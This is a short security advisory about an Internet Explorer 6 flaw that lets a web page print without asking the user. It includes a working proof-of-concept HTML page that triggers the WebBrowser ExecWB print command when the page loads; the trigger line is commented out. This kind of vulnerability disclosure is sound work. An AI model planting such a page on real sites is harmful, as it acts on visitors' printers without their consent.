‘Internet Explorer Print without Prompting’

Summary

‘Microsoft Internet Explorer is the dominant web browser in the world, used by millions of people. Internet Explorer allows a malicious user to send pages to a connected printer without it being prompted for user intervention. The vulnerability can be exploited by using JavaScript, HTML and OLE.’

Credit:

‘The information has been provided by Ben Garvey.’


Details

Vulnerable Systems:
 * Internet Explorer version 6

Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious document to send pages to the printer without prompting the user. An example page that exploits the vulnerability is given below. The offending line must be commented out in order for the page to work, so are any linebreaks that break the JavaScript code.

<HTML>
<HEAD>
<SCRIPT language=’JavaScript’>
function ieExecWB( intOLEcmd, intOLEparam )
{
        // Create OLE Object
         var WebBrowser = ‘<OBJECT ID=’WebBrowser1′ WIDTH=0 HEIGHT=0
         CLASSID=’CLSID:8856F961-340A-11D0-A96B-00C04FD705A2’></OBJECT>’;

          // Place Object on page
          document.body.insertAdjacentHTML(‘beforeEnd’, WebBrowser);

         // if intOLEparam is not defined, set it
          if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam > 1) )
           intOLEparam = 1;

         // Execute Object
          WebBrowser1.ExecWB( intOLEcmd, intOLEparam );

          // Destroy Object
          WebBrowser1.outerHTML = ”;
}

function printAll()
{
        // Uncomment this to enable the exploit!
        //ieExecWB(6,-1);
}
</SCRIPT>
</HEAD>
<BODY onload=’printAll()’>
<h3>I like your PRINTER</h3>
</BODY>
</HTML>

Categories: Windows